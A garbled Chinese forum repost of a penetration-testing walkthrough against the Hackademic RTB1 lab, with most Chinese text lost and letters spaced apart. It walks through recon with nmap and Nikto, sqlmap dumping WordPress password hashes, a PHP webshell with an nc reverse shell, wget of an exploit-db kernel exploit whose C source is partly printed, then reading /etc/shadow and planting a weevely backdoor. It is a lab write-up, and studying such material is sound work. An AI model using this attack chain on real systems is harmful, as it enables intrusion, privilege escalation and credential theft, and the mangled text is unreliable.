搜索

[20741] 2017-05-08_从信息收集到入侵提权(渗透测试基础总结)

文档创建者:s7ckTeam
浏览次数:51
最后更新:2025-01-18
2017-05-08_从信息收集到入侵提权(渗透测试基础总结) ( ) L e m o n S e c   2 0 1 7 - 0 5 - 0 8 . 1 . 2 . s q l m a p 使 3 . n m a p 使 4 . n c 5 . l i n u x 6 . b a c k t r a c k   5 k a l i n i k t o w 3 a f 使 : h a c k - t e s t . c o m p i n g I P . I P : 1 7 3 . 2 3 6 . 1 3 8 . 1 1 3 使 s a m e i p . o r g . 2 6   s i t e s   h o s t e d   o n   I P   A d d r e s s   1 7 3 . 2 3 6 . 1 3 8 . 1 1 3 1 7 3 . 2 3 6 . 1 3 8 . 1 1 3 2 6 1 .   D N S   r e c o r d s   ( A ,   N S ,   T X T ,   M X   a n d   S O A ) 2 .   W e b   S e r v e r   T y p e   ( A p a c h e ,   I I S ,   T o m c a t ) 3 .   R e g i s t r a r   ( t h e   c o m p a n y   t h a t   o w n s   y o u r   d o m a i n ) 4 .   Y o u r   n a m e ,   a d d r e s s ,   e m a i l   a n d   p h o n e 5 .   S c r i p t s   t h a t   y o u r   s i t e   u s e s   ( p h p ,   a s p ,   a s p . n e t ,   j s p ,   c f m ) 6 .   Y o u r   s e r v e r   O S   ( U n i x , L i n u x , W i n d o w s , S o l a r i s ) 7 .   Y o u r   s e r v e r   o p e n   p o r t s   t o   i n t e r n e t   ( 8 0 ,   4 4 3 ,   2 1 ,   e t c . ) D N S w h o . i s .
D N S w e b W e b a p a c h e . , . H A C K - T E S T . C O M   S I T E   I N F O R M A T I O N I P :   1 7 3 . 2 3 6 . 1 3 8 . 1 1 3 W e b s i t e   S t a t u s :   a c t i v e S e r v e r   T y p e :   A p a c h e A l e x a   T r e n d / R a n k :     1   M o n t h :   3 , 2 1 3 , 9 6 8   3   M o n t h :   2 , 1 6 1 , 7 5 3 P a g e   V i e w s   p e r   V i s i t :     1   M o n t h :   2 . 0   3   M o n t h :   3 . 7
. b a c k t r a c k   5 w h a t w e b . 使 p h p w o r d p r e s s F e d o r a   L i n u x W e b A p a c h e   2 . 2 . 1 5 . n m a p : 1 - F i n d   s e r v i c e s   t h a t   r u n   o n   s e r v e r ( ) 2 - F i n d   s e r v e r   O S ( ) 8 0 , L i n u x 2 . 6 . 2 2 F e d o r a   C o r e   6 ,   , : S q l   i n j e c t i o n     B l i n d   s q l   i n j e c t i o n     L F I     R F I     X S S     C S R F   . 使 N i k t o : r o o t @ b t : / p e n t e s t / w e b / n i k t o #   p e r l   n i k t o . p l   - h   h a c k - t e s t . c o m
B a c k t r a c k   5   k a l i W 3 A F   : r o o t @ b t : / p e n t e s t / w e b / w 3 a f #   . / w 3 a f _ g u i , . .
s q l X S S . S Q L . h t t p : / / h a c k - t e s t . c o m / H a c k a d e m i c _ R T B 1 / ? c a t = d 2 7 z 2 2 0 U R L S Q L S q l m a p u r l . U s i n g   s q l m a p   w i t h   u   u r l N m y s q l m y s q l 5 . 0 .   - d b s .   , - D   w o r d p r e s s   - t a b l e s w o r d p r e s s - T   w p _ u s e r s   c o l u m n s   w p _ u s e r s .
u s e r _ l o g i n u s e r _ p a s s . - C   u s e r _ l o g i n , u s e r _ p a s s   d u m p h a s h e s .   线 h a s h e s h t t p : / / w w w . o n l i n e h a s h c r a c k . c o m / f r e e - h a s h - r e v e r s e . p h p w o r d p r e s s w p - a d m i n p h p   w e b s h e l l 便 l i n u x . .   T e x t i l e p h p   w e b s h e l l 访 p h p   w e b s h e l l .
P h p   w e b s h e l l r o o t , N C s h e l l , 5 5 5 5 . P h p   w e b s h e l l I P 5 5 5 5 .     i d   u i d = 4 8 ( a p a c h e )   g i d = 4 8 9 ( a p a c h e )   g r o u p s = 4 8 9 ( a p a c h e )   i d
p w d   / v a r / w w w / h t m l / H a c k a d e m i c _ R T B 1 / w p - c o n t e n t / p l u g i n s   u n a m e   - a   L i n u x   H a c k a d e m i c R T B 1   2 . 6 . 3 1 . 5 - 1 2 7 . f c 1 2 . i 6 8 6   # 1   S M P   S a t   N o v   7   2 1 : 4 1 : 4 5   E S T   2 0 0 9   i 6 8 6   i 6 8 6   i 3 8 6   G N U / L i n u x 2 . 6 . 3 1 . 5 - 1 2 7 . f c 1 2 . 1 6 8 6 , e x p l o i t - d b . c o m . e x p e x p . h t t p : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 1 5 2 8 5   n c   s h e l l : w g e t   h t t p : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 1 5 2 8 5   - o   r o r o . c ( e x p r o r o . c ) l i n u x e x p C , . c . e x p   r o r o . c   # i n c l u d e   < s t d i o . h > # i n c l u d e   < u n i s t d . h > # i n c l u d e   < s t d l i b . h > # i n c l u d e   < f c n t l . h > # i n c l u d e   < s y s / t y p e s . h > # i n c l u d e   < s y s / s o c k e t . h > # i n c l u d e   < n e t i n e t / i n . h > # i n c l u d e   < e r r n o . h > # i n c l u d e   < s t r i n g . h > # i n c l u d e   < s y s / p t r a c e . h > # i n c l u d e   < s y s / u t s n a m e . h > # d e f i n e   R E C V P O R T   5 5 5 5 # d e f i n e   S E N D P O R T   6 6 6 6 i n t   p r e p _ s o c k ( i n t   p o r t ) { i n t   s ,   r e t ; s t r u c t   s o c k a d d r _ i n   a d d r ; s   =   s o c k e t ( P F _ R D S ,   S O C K _ S E Q P A C K E T ,   0 ) ; i f ( s   <   0 ) { p r i n t f ( [ * ]   C o u l d   n o t   o p e n   s o c k e t . n ) ; e x i t ( - 1 ) ; } m e m s e t ( & a d d r ,   0 ,   s i z e o f ( a d d r ) ) ;   e x p C e l f , :  
g c c   r o r o . c   o   r o r o   e x p   . / r o r o i d   i d   r o o t   u i d = 0 ( r o o t )   g i d = 0 ( r o o t ) / e t c / s h a d o w c a t   / e t c / s h a d o w / e t c / p a s s w d   c a t   / e t c / p a s s w d
使 j o h n   t h e   r i p p e r . 便 访 . w e e v e l y p h p . 1 . w e e v e l y 使 r o o t @ b t : / p e n t e s t / b a c k d o o r s / w e b / w e e v e l y #   . / m a i n . p y   2 . w e e v e l y k o k o p h p r o o t @ b t : / p e n t e s t / b a c k d o o r s / w e b / w e e v e l y #   . / m a i n . p y   - g   - o   h a x . p h p   - p   k o k o 使 r o o t @ b t : / p e n t e s t / b a c k d o o r s / w e b / w e e v e l y #   . / m a i n . p y   - t   - u   h t t p : / / h a c k - t e s t . c o m / H a c k a d e m i c _ R T B 1 / w p - c o n t e n t / p l u g i n s / h a x . p h p   - p k o k o
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理